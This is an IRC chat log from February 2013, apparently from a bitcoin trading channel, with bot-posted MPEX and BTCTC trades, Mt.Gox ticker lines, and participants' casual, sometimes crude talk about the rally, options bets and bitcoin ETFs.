05:06:37 [MPEX] [S.MPOE] 2033 @ 0.00063722 = 1.2955 BTC [-] Feb 14 05:06:38 [MPEX] [S.MPOE] 1665 @ 0.00064701 = 1.0773 BTC [+] Feb 14 05:06:40 [MPEX] [S.MPOE] 4321 @ 0.00064784 = 2.7993 BTC [+] Feb 14 05:06:41 [MPEX] [S.MPOE] 4321 @ 0.00064784 = 2.7993 BTC [+] Feb 14 05:06:43 [MPEX] [S.MPOE] 1810 @ 0.00064785 = 1.1726 BTC [+] Feb 14 05:08:34 [MPEX] [S.MPOE] 3754 @ 0.00063696 = 2.3911 BTC [-] Feb 14 05:08:36 [MPEX] [S.MPOE] 2096 @ 0.0006368 = 1.3347 BTC [-] Feb 14 05:09:23 [MPEX] [S.MPOE] 2225 @ 0.0006368 = 1.4169 BTC [-] Feb 14 05:09:24 [MPEX] [S.MPOE] 4615 @ 0.00063679 = 2.9388 BTC [-] Feb 14 05:12:02 [MPEX] [S.MPOE] 5191 @ 0.00064785 = 3.363 BTC [+] Feb 14 05:12:04 [MPEX] [S.MPOE] 4321 @ 0.0006518 = 2.8164 BTC [+] Feb 14 05:12:06 [MPEX] [S.MPOE] 6500 @ 0.00065181 = 4.2368 BTC [+] Feb 14 05:14:37 ;;ticker Feb 14 05:14:37 BTCUSD ticker | Best bid: 25.00929, Best ask: 25.19900, Bid-ask spread: 0.18971, Last trade: 25.19900, 24 hour volume: 126127.08330674, 24 hour low: 21.72100, 24 hour high: 26.30000, 24 hour vwap: 24.77347 Feb 14 05:17:16 [BTCTC] [S.DICE-PT] 100 @ 0.0063 = 0.63 BTC [+] Feb 14 05:19:02 [BTCTC] [S.MPOE-PT] 1 @ 0.00067 BTC [-] Feb 14 05:19:45 [BTCTC] [S.MPOE-PT] 500 @ 0.00067 = 0.335 BTC [-] Feb 14 05:23:05 [MPEX] [S.MPOE] 692 @ 0.00065181 = 0.4511 BTC [+] Feb 14 05:23:07 [MPEX] [S.MPOE] 4321 @ 0.00065205 = 2.8175 BTC [+] Feb 14 05:23:15 [MPEX] [S.MPOE] 1000 @ 0.00065222 = 0.6522 BTC [+] Feb 14 05:23:17 [MPEX] [S.MPOE] 4781 @ 0.00065223 = 3.1183 BTC [+] Feb 14 05:29:38 ha, the new header borked my spreadsheet Feb 14 05:29:40 fixed now Feb 14 05:35:51 is there a way to subscribe to the trades feed without polling the rss feed? Feb 14 05:36:42 and how often is considered kosher (on MPEx) Feb 14 05:37:38 [BTCTC] [B.YABMC] 1 @ 0.0157 BTC [-] Feb 14 05:38:40 [BTCTC] [B.YABMC] 8 @ 0.0156 = 0.1248 BTC [-] Feb 14 05:38:55 [BTCTC] [B.YABMC] 1 @ 0.0154 BTC [-] Feb 14 05:39:52 [MPEX] [S.MPOE] 13250 @ 0.00065223 = 8.642 BTC [+] Feb 14 05:41:30 [BTCTC] [GSDPT] 10 @ 0.00595 = 0.0595 BTC [-] Feb 14 05:41:45 [BTCTC] [GSDPT] 10 @ 0.0061 = 0.061 BTC [+] Feb 14 05:42:03 [BTCTC] [GSDPT] 20 @ 0.0061 = 0.122 BTC [+] Feb 14 05:42:29 ;;ticker Feb 14 05:42:30 BTCUSD ticker | Best bid: 25.56458, Best ask: 25.57789, Bid-ask spread: 0.01331, Last trade: 25.42042, 24 hour volume: 131695.93004727, 24 hour low: 21.72100, 24 hour high: 26.30000, 24 hour vwap: 24.80064 Feb 14 05:42:34 lolz Feb 14 05:42:34 [BTCTC] [S.BBET-PT] 10 @ 0.00195 = 0.0195 BTC [-] Feb 14 05:43:21 25.9 Feb 14 05:43:24 haha Feb 14 05:43:37 unserious. Feb 14 05:44:19 wow, did it bounce back to 26? Feb 14 05:44:28 Look at the depth charts tho Feb 14 05:44:30 http://www.bitcoincharts.com/markets/mtgoxUSD.html Feb 14 05:44:45 5k buy 5 min ago Feb 14 05:45:09 [BTCTC] [BTC-BOND] 1 @ 0.00981 BTC [-] Feb 14 05:45:25 [BTCTC] [BTC-BOND] 1 @ 0.00981 BTC [-] Feb 14 05:45:26 i am aware of depth, lookin at same thing since 2011 or what was it Feb 14 05:45:30 http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Feb 14 05:46:28 [BTCTC] [S.MPOE-PT] 100 @ 0.00067 = 0.067 BTC [-] Feb 14 05:46:30 fuk Feb 14 05:46:49 [BTCTC] [S.DICE-PT] 1 @ 0.0063 BTC [+] Feb 14 05:46:57 preety insane eh Feb 14 05:47:14 deez nuts Feb 14 05:47:16 there we go, bids rising Feb 14 05:48:07 I wish I had enough coins to destroy this rally Feb 14 05:49:03 [BTCTC] [MININGCO.ETF] 3 @ 0.59 = 1.77 BTC [+] Feb 14 05:49:31 One of the larger player off to sell off a good chunk soon before it's too late. Feb 14 05:49:58 stay strong NAMWORLD Feb 14 05:50:20 What for? Feb 14 05:50:31 I'm certain it will go back down hard soon. Feb 14 05:50:43 But I'm not 100% sure that soon will be before the 22th Feb 14 05:51:09 Either way, I put 280 BTC down on my puts Feb 14 05:52:37 sheeeit Feb 14 05:52:52 there was a 5k green candle on the bounce now Feb 14 05:53:26 Old news Feb 14 05:53:37 make the dings stopppp Feb 14 05:53:57 I dunnot though Feb 14 05:54:04 that was a HEAVY move down Feb 14 05:54:11 not convinced the drop is done Feb 14 05:54:48 christ on a stick Feb 14 05:54:49 [MPEX] [S.MPOE] 1130 @ 0.00065223 = 0.737 BTC [+] Feb 14 05:54:51 [MPEX] [S.MPOE] 9970 @ 0.00065228 = 6.5032 BTC [+] Feb 14 05:54:52 I am not either... Feb 14 05:55:02 Dropped a lot, then it started going back up fast Feb 14 05:55:18 it was a slow fall Feb 14 05:55:19 people bought... but that was because there's no market depth. Feb 14 05:55:21 fo a while Feb 14 05:55:26 I look at the depth charts Feb 14 05:55:37 Well... Cant exite Feb 14 05:55:45 without assrapage Feb 14 05:55:50 I'll sleep on it Feb 14 05:56:09 That dude that covered his put short Feb 14 05:56:15 raped again Feb 14 05:56:23 he is MPOEs best freind Feb 14 05:56:25 [MPEX] [S.MPOE] 5796 @ 0.00065169 = 3.7772 BTC [-] Feb 14 05:56:26 When it's either lose 90% on exiting or stay on your decision... Feb 14 05:56:30 funds half the bond Feb 14 05:56:49 Better stick to your decision. That 10% will be no consolation. Feb 14 05:57:12 this still comforts me Feb 14 05:57:12 http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Feb 14 05:57:27 Well yeah, at least rally looks killed. Feb 14 05:58:04 i dunno Feb 14 05:58:10 I just dont know Feb 14 05:58:19 I don't think it was a bad call though Feb 14 05:58:22 like Feb 14 05:58:42 I bought the puts at 25.00 Feb 14 05:59:04 and it went to 21.72 Feb 14 05:59:09 that is not a bad call Feb 14 05:59:10 I think the odds of the rally going down before the 22th are good. That first drop and more bearish ask is good enough to me. Feb 14 05:59:30 I've been waiting on it for weeks. Feb 14 06:00:04 going to bed Feb 14 06:00:08 good luck Feb 14 06:00:13 To you too. Feb 14 06:00:38 [BTCTC] [BTC-GOLD] 10 @ 0.0299 = 0.299 BTC [+] Feb 14 06:03:02 [HAVELOCK] [SDICE] 1 @ 0.7499998 BTC [+] Feb 14 06:08:06 ;;ticker Feb 14 06:08:07 BTCUSD ticker | Best bid: 25.78395, Best ask: 26.00000, Bid-ask spread: 0.21605, Last trade: 26.25000, 24 hour volume: 137291.37159601, 24 hour low: 21.72100, 24 hour high: 26.30000, 24 hour vwap: 24.87115 Feb 14 06:08:13 sooo.. back up ? Feb 14 06:08:45 im suprised Feb 14 06:08:57 Some bought back a few thousands... Feb 14 06:09:09 But now the bids depths are very short Feb 14 06:09:17 http://www.bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Feb 14 06:13:22 methinks the mtgox book may be as meaningless as the mpex book. Feb 14 06:13:39 Maybe Feb 14 06:14:03 swhitt i guess you could use feedburner or such ? Feb 14 06:14:18 mircea_popescu: hi Feb 14 06:14:29 I wish I had enough coins to destroy this rally <<< one doesn't simply destroy this rally. Feb 14 06:14:31 I was just wondering how often would be considered 'impolite' by yourself Feb 14 06:15:11 if I were to be polling for changes Feb 14 06:15:56 the rss ? anything over 10 times a minute i guess Feb 14 06:16:16 [MPEX] [S.MPOE] 7125 @ 0.00065228 = 4.6475 BTC [+] Feb 14 06:16:24 !ticker m s.mpoe Feb 14 06:16:26 [MPEX:S.MPOE] 1D: 0.00063679 / 0.00064992 / 0.00066142 (1336281 shares, 868.48 BTC), 7D: 0.0006153 / 0.00065743 / 0.0007 (18930104 shares, 12,445.28 BTC), 30D: 0.00059445 / 0.00066264 / 0.0007 (72883171 shares, 48,295.65 BTC) Feb 14 06:17:35 mircea_popescu: oh, ok. I won't be anything near that. I'd let you know before I did anything close to that. How often does assbot poll? Feb 14 06:17:51 assbot gets a push Feb 14 06:18:05 ah Feb 14 06:18:07 you can also get the twitter feed, if you have a twitter api key Feb 14 06:18:17 (twitter also gets a push) Feb 14 06:18:21 no way to subscribe to a push at this time? Feb 14 06:18:38 nah, not currently. Feb 14 06:18:42 that might be easier to ensure that everything is up to date. Feb 14 06:18:45 kk Feb 14 06:18:54 thanks for the info Feb 14 06:19:20 ya but you'd have to be strategically important. in general what im thinking is push to some high uptime strong distribution networks and everyone can poll those Feb 14 06:19:32 seems the most stable/efficient solution Feb 14 06:19:46 you can probably configure a listener bot in this chan and it can push to you wherever tho Feb 14 06:19:55 yeah, I completely understand. That makes sense. Feb 14 06:20:16 if you give me an intiative, i can repush. Feb 14 06:20:17 well, I'd want redundancy if it wasn't the "official" feed Feb 14 06:20:35 so I might do a combination of twitter+irc Feb 14 06:20:44 let me see. Feb 14 06:21:30 http://www.bitcoincharts.com/charts/chart.png?width=940&m=mtgoxUSD&SubmitButton=Draw&r=&i=&c=1&s=2008-11-01&e=2013-02-14&Prev=&Next=&t=S&b=&a1=SMA&m1=365&a2=&m2=25&x=0&i1=&i2=&i3=&i4=&v=1&cv=0&ps=0&l=0&p=0& Feb 14 06:21:36 ;;ticker Feb 14 06:21:37 BTCUSD ticker | Best bid: 25.93500, Best ask: 26.00000, Bid-ask spread: 0.06500, Last trade: 26.00000, 24 hour volume: 141166.77007292, 24 hour low: 21.72100, 24 hour high: 26.30000, 24 hour vwap: 24.90903 Feb 14 06:21:47 That brown line is average growth on 365 days Feb 14 06:21:48 that shows uptrend neh ? Feb 14 06:22:09 [MPEX] [S.MPOE] 3455 @ 0.00065228 = 2.2536 BTC [+] Feb 14 06:22:12 yeah, uptrend. But the current price? Might be a bubble. Feb 14 06:22:13 [MPEX] [S.MPOE] 12295 @ 0.00065327 = 8.032 BTC [+] Feb 14 06:22:13 is there any way to see 2nd derivative of that trendline? Feb 14 06:23:05 I don't know Feb 14 06:24:33 The price raising fast over the yearly trend seems to be near pirate end, when lots of people got burned. Dropped a bit afterward. Then everyone started to load up for some reason. Feb 14 06:24:50 Now in the last days, no asks almost. Price skyrocketed, no one was selling. Feb 14 06:25:27 It just seems like that price is not sustainable to me. Although I think Bitcoins are worth more than last year and will continue trending upward. Feb 14 06:25:47 It's just that now, we're way too high. Feb 14 06:26:15 well not really. Feb 14 06:26:26 the thing with bitcoin is, the larger the total value the more appealing they are to people. Feb 14 06:26:38 so i think one of the reasons price is going up is to give space for various interests. Feb 14 06:30:01 [HAVELOCK] [SDICE] 3 @ 0.748 = 2.244 BTC [-] Feb 14 06:30:02 finally caught up on the chat log, mp, that stripper thread is great Feb 14 06:31:38 Maybe... I don't see the appeal in higher prices tho Feb 14 06:31:45 [MPEX] [S.MPOE] 4305 @ 0.00065327 = 2.8123 BTC [+] Feb 14 06:31:47 [MPEX] [S.MPOE] 7645 @ 0.00065379 = 4.9982 BTC [+] Feb 14 06:31:53 ThickAsThieves totally. she owns them like.... Feb 14 06:32:14 Namworld well the appeal is this : if you go to iran and say hey, don't be stupid moving your dough on aplane, move it in bitcoin Feb 14 06:32:23 they go "does bitcoin have enough mkt cap to cover 200mn ?!" Feb 14 06:32:27 you better be able to say yes. Feb 14 06:33:02 [HAVELOCK] [KCIM] 2 @ 0.99 = 1.98 BTC [+] Feb 14 06:34:02 [HAVELOCK] [SDICE] 1 @ 0.748 BTC [-] Feb 14 06:34:25 Do BitBets resolve before their closing date if satisfied? http://bitbet.us/bet/221/btc-usd-at-mtgox-will-stay-above-20-24-and/ Feb 14 06:34:36 or do they stick to the schedule regardless Feb 14 06:34:56 (high was 26.60) Feb 14 06:35:10 ;;ticker Feb 14 06:35:11 BTCUSD ticker | Best bid: 26.20004, Best ask: 26.25000, Bid-ask spread: 0.04996, Last trade: 26.25000, 24 hour volume: 146215.43264948, 24 hour low: 21.72100, 24 hour high: 26.60000, 24 hour vwap: 24.95764 Feb 14 06:35:20 ya that'll prolly resolve soon Feb 14 06:35:36 it doesn't... if anyone would buy for that much, would skyrocket the price. But then if he wants to sell? Feb 14 06:36:17 he doesnt sell, he keeps transacting in BTC Feb 14 06:36:26 or sells slowly Feb 14 06:36:32 or both more likely Feb 14 06:36:41 interesting moody shows 26.3 high? Feb 14 06:37:14 btccharts is where i got mine Feb 14 06:37:24 the thing is Feb 14 06:37:35 mtgox.com shows it too Feb 14 06:37:37 some prices are converted Feb 14 06:37:54 mtgox usd never reached that high Feb 14 06:38:00 mtgox xxx did Feb 14 06:38:09 converted to usd ... goes over it Feb 14 06:38:48 Up huh? Feb 14 06:38:52 26.65… this rally is mad Feb 14 06:39:14 hehe Feb 14 06:39:20 I am without computer Feb 14 06:39:23 that good kako? :) Feb 14 06:39:25 https://mtgox.com/index.html?Currency=USD Feb 14 06:39:27 So afk it hurtz Feb 14 06:39:36 ;;later tell bugpowder hey man! new top. 26.6! Feb 14 06:39:37 The operation succeeded. Feb 14 06:39:51 ;;ticker Feb 14 06:39:52 BTCUSD ticker | Best bid: 26.19070, Best ask: 26.34181, Bid-ask spread: 0.15111, Last trade: 26.64000, 24 hour volume: 147736.52475072, 24 hour low: 21.72100, 24 hour high: 26.65000, 24 hour vwap: 24.97344 Feb 14 06:40:02 yes it just passed 26.6 in gox usd Feb 14 06:40:07 yuppers Feb 14 06:40:11 crzy Feb 14 06:40:15 fucked Feb 14 06:40:37 i bet about 3btc on monday morning :) Feb 14 06:41:05 i think it was monday... no matter Feb 14 06:41:20 It's a bulltrap... don't listen to mircea... there's some dude who bought tons of calls. He wants price to go down. He just wants more people to buy calls prior to that =P Feb 14 06:41:21 after our conversation about BitBet ive been hanging there more Feb 14 06:42:10 That bitcoins are sustainably worth that much... it's a possibility but I'm betting against it. Feb 14 06:42:58 lol wut Feb 14 06:43:17 anyway, im off to bed. take care all! Feb 14 06:43:20 man, people are panic buying and will for a while Feb 14 06:43:25 adios Feb 14 06:43:30 Bye Feb 14 06:43:51 Maybe I'm just a fool... put the average bitcoiner and newbies seem incredibly bearish... that gotta blow up at some point. Feb 14 06:44:04 nah, bears are just loud Feb 14 06:44:10 ROAR Feb 14 06:44:16 eh Feb 14 06:44:30 I meant bullish >.> Feb 14 06:44:32 i'm not saying *something* cant stop the rally Feb 14 06:44:36 but the natural course is up Feb 14 06:44:54 people are investing every day in BTC Feb 14 06:45:38 how long have you been here ThickAsThieves? Feb 14 06:45:41 That's the kind of thoughts that creates bubbles... natural course is up... everyone is investing in it... we'll always have someone else to sell to **** BEGIN LOGGING AT Thu Feb 14 11:51:11 2013 Feb 14 11:51:37 ;;ticker Feb 14 11:51:38 BTCUSD ticker | Best bid: 25.96624, Best ask: 26.01999, Bid-ask spread: 0.05375, Last trade: 25.96624, 24 hour volume: 158444.85494761, 24 hour low: 21.72100, 24 hour high: 26.65000, 24 hour vwap: 25.05489 Feb 14 11:51:45 heh. wild times Feb 14 11:51:47 [BTCTC] [S.MPOE-PT] 1 @ 0.00067 BTC [-] Feb 14 11:54:09 Anonymous Feb 14 11:54:09 fuck you bitcoin i lost. Feb 14 11:54:15 lol sweet tears Feb 14 12:02:58 [MPEX] [S.MPOE] 4321 @ 0.0006428 = 2.7775 BTC [+] Feb 14 12:03:00 [MPEX] [S.MPOE] 4629 @ 0.00064308 = 2.9768 BTC [+] Feb 14 12:09:02 [MPEX] [S.MPOE] 4788 @ 0.00063992 = 3.0639 BTC [-] Feb 14 12:09:04 [MPEX] [S.MPOE] 1762 @ 0.00063917 = 1.1262 BTC [-] Feb 14 12:21:49 [MPEX] [S.MPOE] 2559 @ 0.00063917 = 1.6356 BTC [-] Feb 14 12:21:51 [MPEX] [S.MPOE] 5841 @ 0.00063916 = 3.7333 BTC [-] Feb 14 12:22:54 mircea: ? Feb 14 12:23:04 Did the guy with calls cash out already? Feb 14 12:23:12 http://bitbet.us/bet/221/btc-usd-at-mtgox-will-stay-above-20-24-and/ Feb 14 12:23:13 that. Feb 14 12:23:42 oh. Lol Feb 14 12:24:10 what is the vwap at now? Feb 14 12:24:23 [MPEX] [S.MPOE] 6009 @ 0.00063916 = 3.8407 BTC [-] Feb 14 12:24:25 [MPEX] [S.MPOE] 12891 @ 0.000638 = 8.2245 BTC [-] Feb 14 12:24:48 ;;ticker Feb 14 12:24:48 BTCUSD ticker | Best bid: 26.07000, Best ask: 26.07001, Bid-ask spread: 0.00001, Last trade: 26.07001, 24 hour volume: 158889.21035303, 24 hour low: 21.72100, 24 hour high: 26.65000, 24 hour vwap: 25.05851 Feb 14 12:24:51 ;;bc,24hprc Feb 14 12:24:52 25.05 Feb 14 12:24:52 25.01 Feb 14 12:24:58 somewhere there. Feb 14 12:25:03 ok cool Feb 14 12:26:01 options can be complicated enough without worrying about fx risk on top lol Feb 14 12:26:12 "Yeah, yeah, I can tell you do not have a very highly developed capacity for abstract thinking -- developers do not necessarily care much about the design of things but often prioritize functionality, i. e. you are not my target market so go and play with some lego blocks, I am sure you will find them colorful and appealing." Feb 14 12:26:14 dude totally. Feb 14 12:26:26 i dunno why people keep ragging on mpoe-pr, she never says shit like that. Feb 14 12:35:28 http://www.btcguild.com/halloffame.php Feb 14 12:35:34 o hey that guy is going well. Feb 14 12:39:02 mircea, do you think that coinbase could be a large part of this rally? Feb 14 12:39:36 they are pretty new and supposedly doing a ton of volume Feb 14 12:39:41 expanding the user base Feb 14 12:40:13 possibru Feb 14 12:40:18 has to have some impact, i think it's a combination of them and the ton of news coming out about bitcoins Feb 14 12:41:01 i even think that it is possible that if they have halted sales due to demand, that they caused the dip Feb 14 12:41:12 but purely speculative Feb 14 12:41:27 maybe it's driven by people trying to get on mpex. Feb 14 12:41:29 i mean a million dollars a month is not crazy, but i think it would move the market Feb 14 12:41:43 lol, s.dice is doing well for me right now Feb 14 12:41:50 but mpoe is undervalued i think Feb 14 12:42:16 i hold both Feb 14 12:42:26 but i look forward to the end of the month report Feb 14 12:42:46 won't be long now Feb 14 12:43:45 yeah, can you believe that someone said to me on reddit (of course you can) that exchange rate has nothing to do with returns Feb 14 12:43:53 ie. you either hold S.DICE or you hold Bitcoins Feb 14 12:44:37 i'm like, you sell and buy S.DICE or S.MPOE using bitcoins, it's a way to grow your bitcoins, and the value of those bitcoins changes, so your total return when measured in dollars is a function of both effects Feb 14 12:45:19 well, people think that s.dice betting volumes are somehow related to bitcoin price Feb 14 12:45:30 this may or may not be true. if you look at the graphs there's no relation so far. Feb 14 12:45:41 but maybe because other factors drowned it out and will be more apparent in the future. Feb 14 12:47:03 true Feb 14 12:47:36 but that does not change the fact that when measured in USD, your total return is still a function of price of bitcoins and price of shares + dividends Feb 14 12:47:56 same on any stock exchange when you are in a different country Feb 14 12:48:17 if i buy japanese stocks on nikei, i have to also account for yen/usd exchange Feb 14 12:48:41 anyway, if i am expecting financial savvy on reddit, i should get my head checked Feb 14 12:48:59 this is true. Feb 14 12:49:06 on all counts lol Feb 14 12:49:58 [BTCTC] [B.YABMC] 1 @ 0.0242 BTC [+] Feb 14 12:50:28 http://www.universa.net/ check out this site, the first message is amazingly true Feb 14 12:50:59 [MPEX] [S.MPOE] 1750 @ 0.00064308 = 1.1254 BTC [+] Feb 14 12:52:11 i get http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif Feb 14 12:52:30 lol, yeah, it is a flash heavy site Feb 14 12:52:34 but the first quote is... Feb 14 12:53:49 [MPEX] [S.MPOE] 1962 @ 0.00064308 = 1.2617 BTC [+] Feb 14 12:53:51 [MPEX] [S.MPOE] 3238 @ 0.00064399 = 2.0852 BTC [+] Feb 14 12:54:20 There is no means of avoiding the final collapse of a boom brought about by credit expansion. The alternative is only whether the crisis should come sooner as the result of voluntary abandonment of further credit expansion, or later as a final and total catastrophe of the currency system involved. Feb 14 12:54:43 it's the hedge fund that nassim taleb works at Feb 14 12:55:02 i just finished antifragile, and i think it is a great book, i just wonder if he is aware of bitcoins Feb 14 12:55:36 he's prolly right. Feb 14 12:56:01 that was a quote from ludwig von mises Feb 14 12:56:05 i think the bitcoin gambit currently is to try and persuade some hedge fund people. Feb 14 12:56:14 that is what i am working on Feb 14 12:56:21 because that will change everything Feb 14 12:56:28 if you can bridge wall st and bitcoins Feb 14 12:56:48 you can first of all get a rally up to $100 if capital starts pouring in Feb 14 12:56:57 and second of all gain legitimacy as they are behind it Feb 14 12:57:06 http://bitbet.us/bet/153/s-mpoe-will-rise-this-spring/ Feb 14 12:57:07 since they have washington in their pocket Feb 14 12:57:59 my original plan was to get a public company with bitcoins as assets Feb 14 12:58:11 but i would have to do a reverse merger for that and buy a public company Feb 14 12:58:16 so might be too hard Feb 14 12:58:34 so now i am looking at a slower approach to start a hedge fund type deal Feb 14 12:59:07 i already convinced the CEO of my company and he is meeting with some Forex guys and is going to see if they could offer a product using bitcoins Feb 14 12:59:37 at some point, people on wall st will realize that instead of gold, bitcoins are a much better opportunity against the dollar Feb 14 12:59:46 they're realising. Feb 14 12:59:54 at that point, there will be an influx of capital that has never been seen in bitcoin Feb 14 12:59:57 they are Feb 14 12:59:58 a bunch of mpex traders are actually traders. Feb 14 13:00:00 i agree Feb 14 13:00:02 i know Feb 14 13:00:07 this has been going on for a while by now. Feb 14 13:00:17 i know that a lot of people in this field are in finance Feb 14 13:00:21 but they do this on their own Feb 14 13:00:27 soon, it will be financial companies Feb 14 13:00:38 and at that point, we will see a ton of demand all at once Feb 14 13:00:41 in my opinion Feb 14 13:01:09 egypt, argentina, venezuela etc. Feb 14 13:01:17 fiat currencies are failing hard Feb 14 13:01:49 and today i realized that our system is not tried and proven, it is very very new, we only adopted this in the US in 1971 Feb 14 13:02:03 so it is still an experiment, having money not backed by any asset Feb 14 13:02:54 if someone could start an ETF that tracks bitcoins, that would change everything, that is what i was trying to do, but it is hard Feb 14 13:03:18 getting it publicly available would cost like 50k, and that is just basically a setup fee Feb 14 13:03:55 so why's that hard ? Feb 14 13:04:08 well...you get no return on that 50k Feb 14 13:04:18 all you need is someone start a general partnership with a few tens of mils from a dozen friends Feb 14 13:04:21 and it's done Feb 14 13:04:28 well yeah Feb 14 13:04:35 prolly happen this year, too. Feb 14 13:04:38 if i had a few tens of mills it would be done already Feb 14 13:05:00 its easy, you let people buy a bitcoin backed ETF with their etrade accounts Feb 14 13:05:06 they have a hedge against the dollar Feb 14 13:05:08 inflation proof Feb 14 13:05:15 and currently yielding great returns Feb 14 13:05:33 just a tiny fraction of the money on wall street could quadruple the "market cap" of bitcoin Feb 14 13:05:57 o no Feb 14 13:06:05 this would not be open to the masses for a decade at least. Feb 14 13:06:23 you have to understand the "for people" attitude internet dweebs immediately paint over bitcoin is nothing of any consequence Feb 14 13:06:29 they do it because that's all their experience allows. Feb 14 13:06:34 otherwise, bitcoin is strictly for the elite. Feb 14 13:06:42 [MPEX] [S.MPOE] 1083 @ 0.00064399 = 0.6974 BTC [+] Feb 14 13:06:44 well yeah Feb 14 13:06:44 [MPEX] [S.MPOE] 15102 @ 0.000644 = 9.7257 BTC [+] Feb 14 13:06:49 but if you have a publicly traded stock Feb 14 13:06:52 anyone can buy it Feb 14 13:06:55 but you don't. Feb 14 13:07:03 yeah :( not yet Feb 14 13:07:06 you get a closed partnership with a billion under management Feb 14 13:07:14 that is a nice way to do it too Feb 14 13:07:16 why bother offer it to the public ? the incentives just aren't there Feb 14 13:07:23 but i really want to offer it to the public Feb 14 13:07:33 i guess you do, but that's neither here nor there. Feb 14 13:07:35 so that everyone, even old people who don't understand, can get exposure Feb 14 13:07:46 old people that don't understand shouldn't get exposure. Feb 14 13:07:57 actually : they should *not* get exposure. Feb 14 13:08:13 well Feb 14 13:08:20 i don't want to see us recreate the current system Feb 14 13:08:28 but just put ourselves in positions of power Feb 14 13:08:39 i want to see everyone enjoy this new change Feb 14 13:08:44 or at least have the option to Feb 14 13:09:33 dude. somebody who doesn't understand does not and can not have a position of power. Feb 14 13:09:47 they'll just hurt themselves. Feb 14 13:09:56 [MPEX] [S.DICE] 900 @ 0.00616999 = 5.553 BTC [+] Feb 14 13:11:09 well not power Feb 14 13:11:24 but i want to make it easier for them to get exposure to the bitcoin economy Feb 14 13:11:36 without having to actually get involved Feb 14 13:11:40 similar to gold ETF Feb 14 13:11:42 why ? Feb 14 13:11:46 this is a bad idea. Feb 14 13:11:55 getting involved is a guarantee they put the effort into understanding. Feb 14 13:12:05 well, not if they just buy shares using investment account Feb 14 13:12:06 if they can't be bothered to do that, there's no reason to suspect they won't hurt themselves. Feb 14 13:12:14 true Feb 14 13:12:22 but i think the option should be there Feb 14 13:12:35 so that anyone can actually have a portfolio with publicly traded shares Feb 14 13:12:44 that touches the world of bitcoins Feb 14 13:13:26 so, whether it is a hedge fund or a public company or an etf Feb 14 13:13:28 anyone currently can Feb 14 13:13:35 for 30 btc and a little gpg knowledge. Feb 14 13:13:35 i think something along those lines is coming Feb 14 13:13:40 :) Feb 14 13:13:47 [MPEX] [S.MPOE] 1115 @ 0.00064459 = 0.7187 BTC [+] Feb 14 13:13:49 [MPEX] [S.MPOE] 2385 @ 0.000638 = 1.5216 BTC [-] Feb 14 13:13:49 gpg is also going to be huge Feb 14 13:13:59 it literally takes the average knowledgeable person 1 hour to go from holding some fiat to holding some btc stocks. Feb 14 13:14:08 now, that they'e not knowledgeable is ok, but should be fixed there, Feb 14 13:14:11 not at thios other end Feb 14 13:14:15 but also, i think it is so funny that someone tried to do the idea in reverse Feb 14 13:14:25 what do you mean ? Feb 14 13:14:34 a hedge fund wanted to raise btc so they could convert it out of btc and put it into the stock market Feb 14 13:14:46 they were on twitter called btchedgefund or something Feb 14 13:15:06 https://twitter.com/BTCHedgeFund Feb 14 13:15:09 so backwards Feb 14 13:15:17 [MPEX] [S.MPOE] 4321 @ 0.00064498 = 2.787 BTC [+] Feb 14 13:15:17 let me take your btc and put it into dollars Feb 14 13:15:18 [MPEX] [S.MPOE] 1179 @ 0.000645 = 0.7605 BTC [+] Feb 14 13:15:42 going to grab a smoke brb Feb 14 13:22:40 it's funny though, my friend who i work with is so impressed with nomura because they use pgp Feb 14 13:22:48 [MPEX] [S.MPOE] 534 @ 0.000638 = 0.3407 BTC [-] Feb 14 13:22:50 [MPEX] [S.MPOE] 4321 @ 0.00063796 = 2.7566 BTC [-] Feb 14 13:22:52 [MPEX] [S.MPOE] 6773 @ 0.00063795 = 4.3208 BTC [-] Feb 14 13:22:54 he was like that is the future, they really have their shit together Feb 14 13:27:50 mjr__ ya that's nonsense Feb 14 13:28:02 what is? Feb 14 13:28:02 also often these are simply scams. Feb 14 13:28:05 the backwards Feb 14 13:28:12 yeah for sure Feb 14 13:32:59 one of the things that i take away from all that i've experienced in bitcoins is that if you expect scams, you are safer than getting blindsided by "mortgage-back securities" or credit default swaps Feb 14 13:33:08 the key is to know the risk and the downside Feb 14 13:38:55 hopefully at least. Feb 14 13:57:25 [MPEX] [S.MPOE] 4321 @ 0.00063805 = 2.757 BTC [+] Feb 14 13:57:27 [MPEX] [S.MPOE] 1179 @ 0.00063795 = 0.7521 BTC [-] Feb 14 14:26:39 [MPEX] [S.MPOE] 4321 @ 0.00064481 = 2.7862 BTC [+] Feb 14 14:26:48 [MPEX] [S.MPOE] 5157 @ 0.000645 = 3.3263 BTC [+] Feb 14 14:35:43 [MPEX] [S.MPOE] 64 @ 0.00063797 = 0.0408 BTC [-] Feb 14 14:35:45 [MPEX] [S.MPOE] 1600 @ 0.00063796 = 1.0207 BTC [-] Feb 14 14:35:48 [MPEX] [S.MPOE] 4321 @ 0.00063796 = 2.7566 BTC [-] Feb 14 14:35:50 [MPEX] [S.MPOE] 9932 @ 0.00063795 = 6.3361 BTC [-] Feb 14 14:35:50 [MPEX] [S.MPOE] 1833 @ 0.00063754 = 1.1686 BTC [-] Feb 14 14:49:52 [MPEX] [S.MPOE] 3564 @ 0.000645 = 2.2988 BTC [+] Feb 14 14:49:54 [MPEX] [S.MPOE] 4321 @ 0.00064598 = 2.7913 BTC [+] Feb 14 14:49:56 [MPEX] [S.MPOE] 7783 @ 0.00064599 = 5.0277 BTC [+] Feb 14 14:52:40 [BTCTC] [S.MPOE-PT] 100 @ 0.00067 = 0.067 BTC [-] Feb 14 14:59:10 [BTCTC] [RSM] 232 @ 0.0095 = 2.204 BTC [-] Feb 14 15:05:00 [MPEX] [S.MPOE] 3817 @ 0.00064599 = 2.4657 BTC [+] Feb 14 15:05:02 [MPEX] [S.MPOE] 1650 @ 0.00064785 = 1.069 BTC [+] Feb 14 15:05:04 [MPEX] [S.MPOE] 4321 @ 0.00065143 = 2.8148 BTC [+] Feb 14 15:05:05 [MPEX] [S.MPOE] 3212 @ 0.00065143 = 2.0924 BTC [+] Feb 14 15:10:15 [MPEX] [S.MPOE] 4321 @ 0.00064094 = 2.7695 BTC [-] Feb 14 15:10:17 [MPEX] [S.MPOE] 479 @ 0.00064072 = 0.3069 BTC [-] Feb 14 15:13:19 https://bitcointalk.org/index.php?topic=143972.msg1526968#msg1526968 Feb 14 15:17:07 heh I almost linked that Feb 14 15:17:29 i dont remember seeing this before: 